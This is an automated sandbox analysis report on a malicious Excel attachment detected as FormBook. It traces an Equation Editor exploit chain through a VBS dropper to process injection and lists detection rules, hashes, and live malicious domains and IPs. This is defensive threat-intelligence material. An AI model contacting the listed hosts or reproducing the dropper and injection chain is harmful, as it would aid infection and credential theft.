Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QT2Q1292.xla.xlsx

Overview

General Information

Sample name:QT2Q1292.xla.xlsx
Analysis ID:1520386
MD5:330b3a06df61fa152ea115447ea00c73
SHA1:99cf1cd78b14c95083c63c832f8edd3a90b047cc
SHA256:17bc6d992ad4b0fd62bffda1ca6be76674837c2a15122b2547436db5ba827692
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected FormBook
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Potential malicious VBS script found (has network functionality)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3188 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3496 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3860 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3936 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • temp_executable.exe (PID: 4016 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 3E01AC27E853080CA5C92470DF3F738C)
        • aspnet_compiler.exe (PID: 3032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B830AA2.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1fb4:$obj2: \objdata
  • 0x1fca:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1fb4:$obj2: \objdata
  • 0x1fca:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        13.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        13.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          13.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.235.137.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3860, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3860, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethedifferentofpicture[1].vbs

          System Summary

          barindex
          Sigma detected: Equation Editor Network Connection
          Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3860, Protocol: tcp, SourceIp: 185.235.137.223, SourceIsIpv6: false, SourcePort: 80
          Sigma detected: Suspicious Microsoft Office Child Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3188, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3936, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3188, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3936, ProcessName: wscript.exe
          Sigma detected: AspNetCompiler Execution
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\temp_executable.exe, ParentProcessId: 4016, ParentProcessName: temp_executable.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3032, ProcessName: aspnet_compiler.exe
          Sigma detected: Excel Network Connections
          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.64.88, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3188, Protocol: tcp, SourceIp: 104.21.64.88, SourceIsIpv6: false, SourcePort: 443
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3188, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3936, ProcessName: wscript.exe
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3188, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Sigma detected: Office Macro File Creation
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:27:41.811382+020020196961A Network Trojan was detected192.168.2.2249173185.18.213.20443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:27:41.811382+020020197142Potentially Bad Traffic192.168.2.2249173185.18.213.20443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-27T10:27:44.294980+020028033053Unknown Traffic192.168.2.2249174185.18.213.20443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted file
          Source: QT2Q1292.xla.xlsxReversingLabs: Detection: 28%
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: QT2Q1292.xla.xlsxJoe Sandbox ML: detected

          Exploits

          barindex
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.235.137.223 Port: 80Jump to behavior
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
          Source: ~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp.4.drStream path '_1788916404/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: ~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp.4.drStream path '_1788916409/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: ~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp.4.drStream path '_1788916428/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: ~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp.4.drStream path '_1788916429/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49167 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49173 version: TLS 1.2
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_executable.exe, 0000000C.00000002.536992954.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536837013.0000000000500000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB source: wscript.exe, 0000000B.00000003.516567404.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537512012.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537256594.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516558869.0000000002C41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537571049.0000000000450000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000000.518080598.0000000000BE2000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.11.dr
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_executable.exe, 0000000C.00000002.536992954.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536837013.0000000000500000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb source: wscript.exe, 0000000B.00000003.516567404.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537512012.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537256594.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.516558869.0000000002C41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.537571049.0000000000450000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000000.518080598.0000000000BE2000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.11.dr

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: strmr.co
          Source: global trafficDNS query: name: dl.zerotheme.ir
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
